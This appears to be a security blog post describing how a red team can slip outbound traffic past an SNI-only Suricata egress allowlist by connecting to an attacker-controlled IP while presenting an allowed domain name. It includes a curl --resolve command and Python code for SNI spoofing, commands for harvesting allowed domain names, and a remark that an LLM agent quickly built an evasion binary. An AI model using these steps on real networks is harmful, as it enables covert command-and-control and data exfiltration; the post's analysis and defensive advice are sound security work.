Obfuscating outbound traffic via a Suricata "firewall"

For a few years now, some cloud service providers have resorted to using open-source Suricata network analysis software inline to detect and block malicious outbound traffic. This, of course, works on known indicators. It is worth quoting from this article that, "By the time an IOC has been published in an intelligence report, there is a high likelihood it has been neutralized."

But this post isn't about the use of inline firewalls in a denylist mode of any sort; it is about obfuscating outbound traffic when such network filters are in an allowlist mode, i.e. denying everything unless it's explicitly allowed. Such a configuration does not need IOCs but only a smaller, explicit allowlist.

When a Red Team finds itself in a network where outbound traffic is filtered per an allowlist, what options does it have to punch a hole through? I will discuss a technique that, when certain conditions hold, enables an ethical threat actor (TA) to assign a context-appropriate grade to the egress filtering control in a pentest report for a client, possibly with a higher severity (amber -> red) if the client is in a regulated sector such as healthcare or financial services.

It's worth revisiting why clients prefer filtering on domain names instead of IP addresses. The primary reason is that their third-party partners do not provide IP addresses. The third parties don't have dedicated IPs to begin with, as most CIDR ranges are shared amongst tenants of the underlying cloud. The second, equally important reason is that the domain name, not an IP address, is what forms part of the API contract between the third party and the client. Domain names, when used over HTTPS, bring niceties such as certificate validation as a given. The question to ask from the client's position is this: if they wanted to lock down their outbound traffic to known third parties only, would they allow any IP address at all, whether or not it belongs to a trusted partner? It is this unexpected side-effect of an SNI-only "firewall" that clients find surprising and unpalatable.

What conditions need to be true for this technique?

- There is some traffic to the internet and not just within the same cloud. This can be ascertained by using the `ss -tnp` command, or if the TA knows this to be true as a fact already that would suffice. The output of `ss -tnp` should have some off-cloud public IPs.
- There are connections to peers on port 443 in the output of `ss -tnp`. This is indicative of some HTTPS connections to remote servers.
- Trying connections to public IPs that the TA controls or with domain names in the HTTP(S) call isn't working.

- The TA does have an HTTPS server for their C2, exfil, etc activity with any certificate (valid or not, expired or not – doesn't matter) and knows its IP address.
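The first two conditions can be checked by reading the output of `ss -tn`. The sketch below is one way to do that in Python. The function name `public_https_peers` and the sample output are illustrative assumptions, and `is_global` only says that an address is publicly routable, not that it lies outside the cloud provider's own ranges, so the result still needs a manual look.

```python
import ipaddress


def public_https_peers(ss_output: str) -> list[str]:
    """Return publicly routable peer IPs on port 443 from `ss -tn` output."""
    peers = []
    for line in ss_output.splitlines():
        fields = line.split()
        # Data rows look like: State Recv-Q Send-Q Local:Port Peer:Port [Process]
        if len(fields) < 5 or fields[0] == "State":
            continue
        host, _, port = fields[4].rpartition(":")
        if port != "443":
            continue
        try:
            # IPv6 peers are printed in brackets, e.g. [2606:4700::1111]:443
            addr = ipaddress.ip_address(host.strip("[]"))
        except ValueError:
            continue
        if addr.is_global and str(addr) not in peers:
            peers.append(str(addr))
    return peers


# Hypothetical sample, shaped like `ss -tn` output on a Linux workload.
SAMPLE = """\
State  Recv-Q Send-Q Local Address:Port   Peer Address:Port
ESTAB  0      0      10.0.1.23:51544      8.8.8.8:443
ESTAB  0      0      10.0.1.23:40022      10.0.2.7:443
ESTAB  0      0      10.0.1.23:53310      1.1.1.1:80
"""

print(public_https_peers(SAMPLE))
```

Only the first sample row qualifies: the second peer is a private address and the third is not on port 443.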

The technique

If the egress filter is rebadged Suricata, it won't be* checking the IP address being connected to by an outbound connection at all, but only the domain name present in the TLS handshake (ClientHello) or the HTTP Host header. Let's assume that only HTTPS traffic was allowed to keep things interesting.

*since it's a stateless packet logging software



What the TA needs to accomplish now is to set the domain name in an outbound connection to one that's allowed in the allowlist of the client yet connect to an IP address they themselves control.

If the normal order of things while making a new connection is:

look at domain name -> dns lookup domain name, get ip -> connect to obtained ip -> pass domain name in TLS handshake -> be connected and do work

The desired order for the technique would be:

connect to TA controlled ip -> pass supplied, unrelated to ip domain name in TLS handshake -> be connected and prove defence breach

An example of pulling this off while unprivileged on a Linux instance with curl available would be: `curl -vk --resolve "api.github.com:443:203.0.113.1" https://api.github.com/`. This command skips the DNS lookup for api.github.com altogether and connects to 203.0.113.1 directly, while passing api.github.com in the TLS handshake. A Suricata "firewall" will let this through. In the absence of curl, this logic can, of course, be coded in a compiled language and the resulting static binary deployed on the compromised workload.

Use of --resolve with curl is the same as adding an entry in the /etc/hosts file – but that would require root privileges.
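For hosts without curl, the same behaviour is available from Python's standard `ssl` module, where the name sent in the handshake is simply the `server_hostname` argument. This is a minimal sketch, not the binary discussed in the next section. `client_hello_for` and `connect_with_sni` are hypothetical helper names, and certificate checks are disabled to mirror curl's `-k`.

```python
import socket
import ssl


def _unverified_context() -> ssl.SSLContext:
    """TLS client context that skips certificate checks, like curl -k."""
    ctx = ssl.create_default_context()
    ctx.check_hostname = False
    ctx.verify_mode = ssl.CERT_NONE
    return ctx


def client_hello_for(sni: str) -> bytes:
    """Build a ClientHello in memory to show that the client chooses the SNI."""
    incoming, outgoing = ssl.MemoryBIO(), ssl.MemoryBIO()
    tls = _unverified_context().wrap_bio(incoming, outgoing, server_hostname=sni)
    try:
        tls.do_handshake()
    except ssl.SSLWantReadError:
        pass  # expected: there is no server to answer the ClientHello
    return outgoing.read()


def connect_with_sni(ip: str, sni: str, port: int = 443) -> ssl.SSLSocket:
    """Open a TCP connection to `ip` and present `sni` in the TLS handshake."""
    raw = socket.create_connection((ip, port), timeout=10)
    return _unverified_context().wrap_socket(raw, server_hostname=sni)


# No DNS lookup and no network traffic are needed to produce the handshake bytes.
hello = client_hello_for("api.github.com")
print(b"api.github.com" in hello)
```

A call such as `connect_with_sni("203.0.113.1", "api.github.com")` would then mirror the curl command above: the TCP connection goes to the supplied address while the handshake names `api.github.com`.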

LLMs to the rescue

I sat down with Robert Farrimond to have an LLM produce the equivalent of the above curl command. The iterative agent workflow took ten minutes and produced a binary that would work in most Linux environments, even when libcurl etc. are absent.

A video of a custom SNI spoofing binary being developed by an agent using an LLM

Domain Fronting?

CISA Advisories (AA23-059A, AA24-193A and AA24-326A) have documented successful Red Team operations, described in no more detail than "appear to connect to third-party domains but instead connects to the team’s redirect server" and "allows the beacon to appear to connect to third-party domains, such as nytimes.com, when it is actually connecting to the team’s redirect server", and ascribed them to the general T1090.004 domain fronting technique.



Is this domain fronting, though? Not quite. The key to spotting the deviation from it lies in where the pivot to the TA controlled resource happens.

In domain fronting, a connection is made to a content delivery network (CDN), or a multi-tenant reverse proxy, which is otherwise trusted and reachable from the customer environment. The outer layer of the connection – TLS – contains the allowed domain name in the Server Name Indication (SNI) during the handshake. The inner, encrypted layer – which can only be decrypted by the receiving, terminating CDN – has an HTTP Host header of a TA controlled resource on the same CDN.

However, in the technique described above, the pivot to a TA controlled resource happens at the connection initiation point. The connection never made it to a trusted, third-party CDN at all but instead went to a TA controlled IP address right from the start. This technique is closer to, if not exactly, 'SNI spoofing'.
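The distinction can be stated in terms of three values a connection carries: the destination IP, the SNI and the HTTP Host header. The sketch below is an illustrative classifier, not a detection rule from any product. The `Connection` type, the `classify` function, the `.example` names and the documentation-range addresses are all assumptions, and the set of addresses that legitimately serve the SNI is taken as given.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class Connection:
    dst_ip: str       # address the TCP connection goes to
    sni: str          # name in the TLS ClientHello
    host_header: str  # name in the encrypted HTTP request


def classify(conn: Connection, sni_addresses: set[str]) -> str:
    """Label a connection by where it pivots away from the allowed name.

    `sni_addresses` holds the IPs that legitimately serve `conn.sni`.
    """
    if conn.dst_ip not in sni_addresses:
        # Pivot at connection initiation: the trusted service is never reached.
        return "sni spoofing"
    if conn.host_header != conn.sni:
        # The trusted CDN is reached, then routes on the inner Host header.
        return "domain fronting"
    return "ordinary"


CDN_IPS = {"192.0.2.10"}  # hypothetical addresses serving allowed.example

fronted = Connection("192.0.2.10", "allowed.example", "ta.example")
spoofed = Connection("203.0.113.1", "allowed.example", "allowed.example")
normal = Connection("192.0.2.10", "allowed.example", "allowed.example")

for conn in (fronted, spoofed, normal):
    print(conn.dst_ip, classify(conn, CDN_IPS))
```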

Why api.github.com though? The answer is that it's a really popular one to be found on outbound allowlists. Other educated guesses can be made, especially if the cloud or nature of the business is known – such as graph.facebook.com, login.okta.com, api.datadoghq.com, api.mastercard.com and api.atlassian.com. Lately, api.anthropic.com and api.openai.com have become popular too.

Build environments will typically have pypi.python.org, registry-1.docker.io and dl-cdn.alpinelinux.org.

Failing an educated guess, there are other ways to obtain possible allowed SNIs from an environment. One of them is to look at active connections and figure out what names the peer servers are running as, therefore generating strong hints on what may be in the customer allowlist:

- `ss -tnp | grep ':443'` to obtain a list of current, open TCP connections to port 443.
- `openssl s_client -connect a.b.c.d:443 -showcerts < /dev/null 2> /dev/null | openssl x509 -text -noout | grep 'DNS:'` with `a.b.c.d` replaced with a peer IP address from the previous command, to ascertain the domain names the remote server is running a valid SSL certificate for. Note that this command need not run inside a compromised environment but the previous one must.
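The second step can also be done with Python's standard library when `openssl` is not on hand. This is a sketch under assumptions: `san_dns_names` and `peer_dns_names` are hypothetical helpers, the certificate chain is validated but the hostname is not (the hostname is the unknown here), and no SNI is sent, so a multi-tenant server may return only its default certificate.

```python
import socket
import ssl


def san_dns_names(cert: dict) -> list[str]:
    """Extract DNS entries from the dict returned by SSLSocket.getpeercert()."""
    return [value for kind, value in cert.get("subjectAltName", ()) if kind == "DNS"]


def peer_dns_names(ip: str, port: int = 443) -> list[str]:
    """Connect to a peer IP and list the DNS names on its validated certificate."""
    ctx = ssl.create_default_context()
    ctx.check_hostname = False  # chain is still verified; only name matching is skipped
    with socket.create_connection((ip, port), timeout=10) as raw:
        with ctx.wrap_socket(raw) as tls:
            return san_dns_names(tls.getpeercert())


# Hypothetical certificate dict in the shape getpeercert() returns.
sample_cert = {
    "subject": ((("commonName", "api.example.com"),),),
    "subjectAltName": (
        ("DNS", "api.example.com"),
        ("DNS", "*.example.com"),
        ("IP Address", "192.0.2.10"),
    ),
}
print(san_dns_names(sample_cert))
```

The parsing helper is kept separate from the network call so that it can be run against saved certificate data as well.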

Lessons learnt

I'd say the top one for me was how LLM agent workflows have lowered the bar for coding evasive binaries. I say coding and not developing because the technique was supplied by a human via a prompt – the agent wouldn't have been able to figure out the vulnerability on its own. Some might argue it would've been able to, and I'd love to be corrected there.

Beyond that, the exercise reinforced the need to test a security product thoroughly rather than assume its behaviour just because it's now offered as a managed service. And, of course, to raise issues found with the client while remaining aware of their context. If insider threats, as in financial services, or patient/PII data, as in healthcare, are at stake, it is better to err on the side of caution. For such organisations, it may be prudent to remain with or find cloud firewalls with out-of-band DNS lookups.
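The difference between an SNI-only filter and one that also performs its own DNS lookup can be modelled in a few lines. This is a toy model, not how Suricata or any managed firewall is implemented. `sni_only_allows`, `dns_checked_allows`, the injected `resolve` callable and the sample addresses are all assumptions for illustration.

```python
from typing import Callable, Iterable

ALLOWLIST = {"api.github.com"}


def sni_only_allows(dst_ip: str, sni: str) -> bool:
    """Allow on the handshake name alone; the destination IP is never consulted."""
    return sni in ALLOWLIST


def dns_checked_allows(
    dst_ip: str, sni: str, resolve: Callable[[str], Iterable[str]]
) -> bool:
    """Also require the destination to be an address the filter itself resolved."""
    return sni in ALLOWLIST and dst_ip in set(resolve(sni))


def fake_resolve(name: str) -> list[str]:
    # Stand-in for the filter's own resolver; the address is a documentation placeholder.
    return {"api.github.com": ["192.0.2.10"]}.get(name, [])


spoofed = ("203.0.113.1", "api.github.com")  # TA-controlled IP, allowed name
print(sni_only_allows(*spoofed))
print(dns_checked_allows(*spoofed, fake_resolve))
print(dns_checked_allows("192.0.2.10", "api.github.com", fake_resolve))
```

A real filter would likely need some tolerance here, since the addresses it resolves can differ from those the client received, for example behind CDNs or with short DNS TTLs.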